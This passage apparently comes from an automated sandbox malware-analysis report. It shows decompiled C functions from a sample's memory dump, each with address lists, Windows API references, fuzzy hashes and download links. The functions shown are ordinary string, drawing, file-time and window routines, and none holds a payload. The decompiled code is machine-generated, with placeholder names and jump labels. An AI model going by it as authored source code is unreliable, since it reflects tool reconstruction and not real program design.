							if( *0x43730c <= 1 || MultiByteToWideChar(_t30, 9, _t54, 2, _a4, 0 | _a4 != 0x00000000) == 0) {
								 *_t54 = 0;
								goto L21;
							} else {
								 *_t54 = 0;
								goto L19;
							}
						} else {
							_t38 = _a4;
							if(_t38 != 0) {
								 *_t38 = _t50 & 0x000000ff;
							}
							L13:
							_push(1);
							L14:
							_pop(_t32);
							return _t32;
						}
					} else {
						_t39 = _a4;
						if(_t39 != 0) {
							 *_t39 = 0;
						}
						goto L5;
					}
				}
			}

0x0040eb4b
0x0040eb52
0x0040eb69
0x00000000
0x0040eb59
0x0040eb59
0x0040eb5d
0x0040eb70
0x0040eb75
0x0040eb84
0x0040eb86
0x0040eb77
0x0040eb77
0x0040eb7d
0x0040eb7d
0x0040eb8b
0x0040eba0
0x0040eba5
0x0040ebea
0x0040ebf8
0x0040ec50
0x00000000
0x00000000
0x0040ebda
0x0040ebda
0x0040ebdf
0x00000000
0x0040ebe5
0x0040ebfa
0x0040ec03
0x0040ec0e
0x0040ec2f
0x00000000
0x00000000
0x0040ec31
0x00000000
0x0040ebd1
0x0040ebd1
0x0040ebd1
0x00000000
0x0040ebd1
0x0040ec0e
0x0040ec05
0x0040ec07
0x00000000
0x0040ec07
0x0040eba7
0x0040ebb1
0x0040ebd8
0x00000000
0x0040ebcf
0x0040ebcf
0x00000000
0x0040ebcf
0x0040eb8d
0x0040eb8d
0x0040eb92
0x0040eb98
0x0040eb98
0x0040eb9b
0x0040eb9b
0x0040eb9d
0x0040eb9d
0x00000000
0x0040eb9d
0x0040eb5f
0x0040eb5f
0x0040eb64
0x0040eb66
0x0040eb66
0x00000000
0x0040eb64
0x0040eb5d

APIs

MultiByteToWideChar.KERNEL32(00000006,00000009,?,00000002,00000000,00000000,751470F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EBC5
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,751470F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC21
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,751470F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC48

Strings

qC, xrefs: 0040EBEA

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: qC
API String ID: 626452242-723977305
Opcode ID: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction ID: c9bfa79667547676a2f9c640e0e00b1591e9fa3c2d1d8cd3a8b3004187d1f30f
Opcode Fuzzy Hash: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction Fuzzy Hash: FC31A070204206EFDB20CF22DCC4A6A3BB5AB41711F14893EE5439A2D1E378ECA1D759

Uniqueness

Uniqueness Score: -1.00%

Function 004040A0, Relevance: 6.1, APIs: 4, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004040A0(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t83;
				signed int _t85;
				void* _t126;
				void* _t128;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				asm("cdq");
				_v12 = _a32 / _a40 + 1;
				E004061D5(E00406204(0));
				_t128 = _t126 + 8;
				_v16 = _v8 * _v12;
				while(_v16 > 0) {
					_t83 = E004061E2();
					asm("cdq");
					_v20 = _t83 % _v8;
					_t85 = E004061E2();
					asm("cdq");
					_v24 = _t85 % _v12;
					BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v24 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v24 * _a40, 0xcc0020);
					asm("cdq");
					if(_v16 % 0xa == 0) {
						E0040381D(_a36);
						_t128 = _t128 + 4;
					}
					_v16 = _v16 - 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

0x004040aa
0x004040ac
0x004040ac
0x004040b6
0x004040bd
0x004040c3
0x004040ca
0x004040d8
0x004040dd
0x004040e7
0x004040ea
0x004040f4
0x004040f9
0x004040fd
0x00404100
0x00404105
0x00404109
0x00404155
0x0040415e
0x00404168
0x0040416e
0x00404173
0x00404173
0x0040417c
0x0040417c
0x004041a9
0x004041b4

APIs

_rand.LIBCMT ref: 004040F4
_rand.LIBCMT ref: 00404100
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404155
BitBlt.GDI32(?,?,?,00CC0020,?,?,00000000,?,00CC0020), ref: 004041A9

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: _rand
String ID:
API String ID: 1172538735-0
Opcode ID: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction ID: ed2ed6788aa4e0fa1879982426311b249628acefad2a4dc112bdad2b7b6bc882
Opcode Fuzzy Hash: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction Fuzzy Hash: C83107B5A00109EFCB04DF99C985EEE77B9EF9C308F118269F919A7240D634EA10CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004293D9, Relevance: 6.1, APIs: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004293D9(void* __ecx) {
				INT* _t43;
				CHAR* _t44;
				CHAR* _t47;
				CHAR* _t65;
				void* _t76;
				void* _t81;
				void* _t83;

				E00406520(E0042A890, _t81);
				_t43 =  *(_t81 + 0x20);
				_t65 = 0;
				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
				_t76 = __ecx;
				 *(_t81 - 0x14) = 0;
				 *((intOrPtr*)(_t81 - 0x18)) = 0;
				if(_t43 != 0) {
					L4:
					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
					 *(_t81 + 0x18) = _t44;
					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
						E0041A1BF(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
					}
					E00413206( *(_t81 - 0x14));
					E00413206(_t65);
					_t47 =  *(_t81 + 0x18);
				} else {
					if( *(_t81 + 0x1c) != 0) {
						 *(_t81 - 4) = 0;
						 *(_t81 - 0x14) = E004131DD( *(_t81 + 0x1c) << 2);
						_t65 = E004131DD( *(_t81 + 0x1c));
						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
						E0042914E(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
						_t43 =  *(_t81 - 0x14);
						 *(_t81 + 0x18) = _t65;
						goto L4;
					} else {
						_t47 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t47;
			}

0x004293de
0x004293e6
0x004293ee
0x004293f2
0x004293f5
0x004293f7
0x004293fa
0x004293fd
0x00429456
0x0042946c
0x00429475
0x00429478
0x00429492
0x004294a8
0x004294a8
0x004294b0
0x004294b6
0x004294bb
0x004293ff
0x00429402
0x0042940f
0x0042941c
0x00429427
0x0042942d
0x0042944b
0x00429450
0x00429453
0x00000000
0x00429404
0x00429406
0x00429406
0x00429402
0x004294c5
0x004294ce

APIs

__EH_prolog.LIBCMT ref: 004293DE
ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042946C
GetTextAlign.GDI32(?), ref: 00429481
GetCurrentPositionEx.GDI32(?,?), ref: 00429492

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Text$AlignCurrentH_prologPosition
String ID:
API String ID: 2331262098-0
Opcode ID: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction ID: d4a08c63824a92c840afe16e88adb87e11ee856b7d6374c0f69a009a87428bbd
Opcode Fuzzy Hash: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction Fuzzy Hash: 60311872A0411AAFCF219F95DC45CEF7F79FF08350F10411AF915A2250C7399A61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181F2, Relevance: 6.1, APIs: 4, Instructions: 85
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181F2(void* __ecx, char _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				void* _t29;
				void* _t30;
				long _t33;
				long _t34;
				intOrPtr _t43;
				signed int _t45;
				signed int _t46;
				void* _t54;
				CHAR* _t55;
				intOrPtr* _t56;

				_t56 = _a4;
				_t54 = __ecx;
				E00406330(_t56, 0, 0x118);
				_t2 = _t56 + 0x12; // 0x4181ee
				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
				_t29 =  *(_t54 + 4);
				_t46 = _t45 | 0xffffffff;
				if(_t29 == _t46) {
					L12:
					_t30 = 1;
					return _t30;
				}
				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
					L3:
					return 0;
				}
				_t33 = GetFileSize( *(_t54 + 4), 0);
				 *(_t56 + 0xc) = _t33;
				if(_t33 != _t46) {
					_t55 =  *(_t54 + 0xc);
					if( *((intOrPtr*)(_t55 - 8)) != 0) {
						_t34 = GetFileAttributesA(_t55);
						if(_t34 == _t46) {
							goto L5;
						}
						 *(_t56 + 0x10) = _t34;
						L8:
						 *_t56 =  *((intOrPtr*)(E00410A21( &_a4,  &_v12, _t46)));
						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &_v20, _t46)));
						_t43 =  *((intOrPtr*)(E00410A21( &_a4,  &_v28, _t46)));
						 *((intOrPtr*)(_t56 + 4)) = _t43;
						if( *_t56 == 0) {
							 *_t56 = _t43;
						}
						if( *((intOrPtr*)(_t56 + 8)) == 0) {
							_t24 = _t56 + 4; // 0xfffef685
							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
						}
						goto L12;
					}
					L5:
					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
					goto L8;
				}
				goto L3;
			}

0x004181fa
0x00418205
0x00418208
0x00418210
0x0041821c
0x00418222
0x00418225
0x0041822a
0x004182c2
0x004182c4
0x00000000
0x004182c4
0x00418245
0x00418259
0x00000000
0x00418259
0x0041824c
0x00418254
0x00418257
0x0041825d
0x00418264
0x0041826d
0x00418275
0x00000000
0x00000000
0x00418277
0x0041827a
0x0041828a
0x0041829b
0x004182aa
0x004182ac
0x004182b2
0x004182b4
0x004182b4
0x004182ba
0x004182bc
0x004182bf
0x004182bf
0x00000000
0x004182ba
0x00418266
0x00418266
0x00000000
0x00418266
0x00000000

APIs

lstrcpynA.KERNEL32(004181EE,?,00000104,?,?,?,?,?,?,?,004181DC,?), ref: 0041821C
GetFileTime.KERNEL32(00000000,004181DC,?,?,?,?,?,?,?,?,?,004181DC,?), ref: 0041823D
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004181DC,?), ref: 0041824C
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,004181DC,?), ref: 0041826D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction ID: 4fe2cb551854f978d009958c1be7b26df4981621a34b5ca5644a38b106d1dacc
Opcode Fuzzy Hash: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction Fuzzy Hash: 2D318F76600605AFC721DFA0C885BEBB7B8FF24310F10496EE556D7290EB74A985CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00421DA3, Relevance: 6.1, APIs: 4, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00421DA3() {
				intOrPtr _t25;
				struct HWND__* _t26;
				struct HWND__* _t43;
				struct HWND__** _t50;
				void* _t52;

				E00406520(E0042A3D8, _t52);
				_t25 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
				_t50 =  *(_t52 + 0xc);
				_t26 = _t50[2];
				_t43 = _t50[1];
				 *(_t52 - 4) = 0;
				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
						goto L4;
					}
				} else {
					L4:
					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
				}
				if(_t43 == 0) {
					L8:
					_push(0x50);
					_push( *((intOrPtr*)(_t52 - 0x10)));
					_push( &(_t50[4]));
					if(_t50[2] != 0xfffffdf8) {
						E00416D78();
					} else {
						lstrcpynA();
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
					_push(1);
					_pop(0);
				} else {
					if(E00417298(_t43, _t52 - 0x110, 0x100) != 0) {
						E004172BF(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
						goto L8;
					}
				}
				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
				E00416AEC(_t52 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return 0;
			}

0x00421da8
0x00421db3
0x00421dbb
0x00421dbe
0x00421dc8
0x00421dcb
0x00421dd0
0x00421dd3
0x00421de0
0x00000000
0x00000000
0x00421deb
0x00421deb
0x00421df2
0x00421df2
0x00421df7
0x00421e23
0x00421e26
0x00421e28
0x00421e2e
0x00421e2f
0x00421e39
0x00421e31
0x00421e31
0x00421e31
0x00421e4e
0x00421e52
0x00421e58
0x00421e5a
0x00421df9
0x00421e0d
0x00421e1e
0x00000000
0x00421e1e
0x00421e0d
0x00421e5b
0x00421e62
0x00421e6f
0x00421e77

APIs

__EH_prolog.LIBCMT ref: 00421DA8
GetDlgCtrlID.USER32 ref: 00421DEC
lstrcpynA.KERNEL32(?,?,00000050), ref: 00421E31
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00421E52

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CtrlH_prologWindowlstrcpyn
String ID:
API String ID: 2888839504-0
Opcode ID: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction ID: 51cd8aa0e5dd28eac912709b930bb33ded5dc075b1ee3252d35fc9d3b9766125
Opcode Fuzzy Hash: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction Fuzzy Hash: D8219071600215ABCB30DB65DC85BABB7B8BF14314F44452EF952922E0D3B4A940CA14

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF2C, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BF2C(void* __ecx) {
				int _t30;
				void* _t40;
				int _t42;
				short* _t44;
				int _t45;
				int _t48;
				void* _t49;
				short* _t51;

				_t40 = __ecx;
				_t51 =  *(_t49 - 0x18);
				 *(_t49 - 0x24) = 0;
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t45 =  *(_t49 + 0x14);
				_t42 = 1;
				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
					L8:
					_t30 = 0;
				} else {
					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
					 *(_t49 - 0x20) = _t48;
					if(_t48 == 0) {
						goto L8;
					} else {
						 *(_t49 - 4) = _t42;
						E00406830(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
						 *(_t49 - 0x18) = _t51;
						_t44 = _t51;
						 *(_t49 - 0x28) = _t44;
						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
							goto L8;
						} else {
							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				return _t30;
			}

0x0040bf2c
0x0040bf2c
0x0040bf31
0x0040bf34
0x0040bf38
0x0040bf3d
0x0040bf41
0x0040bfda
0x0040bfda
0x0040bf61
0x0040bf70
0x0040bf72
0x0040bf77
0x00000000
0x0040bf79
0x0040bf79
0x0040bf84
0x0040bf89
0x0040bf8c
0x0040bf8e
0x0040bf91
0x0040bfab
0x00000000
0x0040bfc4
0x0040bfd2
0x0040bfd2
0x0040bfab
0x0040bf77
0x0040bfe2
0x0040bfed

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction ID: 5efc645efc17fcc534c18c6f6ed6037a474d66dfe24f988aec16bcf1503d57bf
Opcode Fuzzy Hash: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction Fuzzy Hash: 3621FA3290021AEBCF218F84CD459DE7FB6FB48750F10416AFA11B21A0C3359962DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041837E, Relevance: 6.1, APIs: 4, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041837E(intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				int _t36;
				void* _t50;

				_t47 = _a4;
				_v28.wYear =  *((intOrPtr*)(E00410A6D(_a4, 0, 0) + 0x14)) + 0x76c;
				_v28.wMonth =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0x10)) + 1;
				_v28.wDay =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0xc));
				_v28.wHour =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 8));
				_v28.wMinute =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 4));
				_t30 = E00410A6D(_t47, 0, 0);
				_v28.wMilliseconds = 0;
				_v28.wSecond =  *_t30;
				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
					E00417D15(_t50, GetLastError(), 0);
				}
				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t36 == 0) {
					return E00417D15(_t50, GetLastError(), 0);
				}
				return _t36;
			}

0x00418386
0x0041839e
0x004183ae
0x004183be
0x004183ce
0x004183de
0x004183e2
0x004183ea
0x004183ee
0x00418408
0x0041840e
0x0041840e
0x0041841a
0x00418422
0x00000000
0x00418428
0x00418430

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004183FA
GetLastError.KERNEL32(00000000), ref: 0041840B
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041841A
GetLastError.KERNEL32(00000000), ref: 00418425

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction ID: 69ffd75d0e39b7352c5362a2be2b2db12d62653dc9023d602915fa8a64db73ca
Opcode Fuzzy Hash: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction Fuzzy Hash: 2F11542AA10319A6CF00BBE698059EFB7BDEF94744B04405BF51197222EB78D6C187ED

Uniqueness

Uniqueness Score: -1.00%

Function 00427D03, Relevance: 6.1, APIs: 4, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427D03(void* __ecx) {
				CHAR* _t35;
				void* _t40;
				CHAR* _t49;
				CHAR* _t55;
				signed int _t56;
				void* _t61;

				E00406520(E0042A190, _t61);
				_t49 =  *(_t61 + 8);
				_t55 =  *(_t61 + 0xc);
				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E004126FB() + 0x1c));
				_t56 = 0 | _t55 != 0x00000001;
				_t35 =  *0x436980; // 0x436994
				 *(_t61 + 8) = _t35;
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				if(E004172BF(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
					if(_t56 != 0) {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
					} else {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
					}
					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
				}
				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
				_t40 = E00416AEC(_t61 + 8);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t40;
			}

0x00427d08
0x00427d11
0x00427d16
0x00427d1f
0x00427d2a
0x00427d35
0x00427d37
0x00427d3c
0x00427d45
0x00427d5b
0x00427d5f
0x00427d7f
0x00427d61
0x00427d69
0x00427d6f
0x00427d99
0x00427d99
0x00427d9f
0x00427da6
0x00427db1
0x00427db9

APIs

__EH_prolog.LIBCMT ref: 00427D08

Part of subcall function 004172BF: lstrlenA.KERNEL32(?), ref: 00417303

wsprintfA.USER32 ref: 00427D69
wsprintfA.USER32 ref: 00427D7F
SendMessageA.USER32 ref: 00427D99

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: wsprintf$H_prologMessageSendlstrlen
String ID:
API String ID: 443212507-0
Opcode ID: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction ID: 7ff1a3cc2775f07db174e29478699fd29c516c00f85defca4782343cc9fd23cc
Opcode Fuzzy Hash: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction Fuzzy Hash: 75214D76A00208ABCB11DFA8DC85ADEB7B9FF08354F018126F919DB251E734DA15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9E4, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041F9E4(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E004201E2();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E0042007A(_t46, _t48, 0);
			}

0x0041f9e7
0x0041f9e8
0x0041f9ee
0x0041f9fd
0x0041fa02
0x0041fa04
0x0041fa0d
0x0041fa17
0x0041fa21
0x0041fa2b
0x0041fa30
0x0041fa37
0x0041fa3d
0x0041fa40
0x0041fa48
0x0041fa42
0x0041fa42
0x0041fa42
0x0041fa51
0x0041fa5d

APIs

OffsetRect.USER32(?,?,?), ref: 0041FA0D
OffsetRect.USER32(?,?,?), ref: 0041FA17
OffsetRect.USER32(?,?,?), ref: 0041FA21
OffsetRect.USER32(?,?,?), ref: 0041FA2B

Memory Dump Source

